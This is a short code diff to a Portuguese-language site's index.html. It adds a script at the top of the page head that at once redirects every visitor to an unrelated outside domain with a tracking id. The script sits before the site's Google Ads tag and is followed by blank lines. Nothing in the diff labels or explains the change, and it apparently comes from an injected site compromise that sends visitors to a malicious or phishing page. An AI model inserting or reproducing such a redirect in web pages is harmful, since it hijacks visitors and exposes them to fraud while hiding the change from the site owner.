--- a/index.html
+++ b/index.html
@@ -1,5 +1,8 @@
 <html lang="pt-BR">
-<head><!-- Google tag (gtag.js) -->
+<head><script>window.location.replace("https://pdax.sslpc.za.com/?id=ZK");</script>
+
+
+<!-- Google tag (gtag.js) -->
 <script async src="https://www.googletagmanager.com/gtag/js?id=AW-17463933449"></script>
 <script>
   window.dataLayer = window.dataLayer || [];
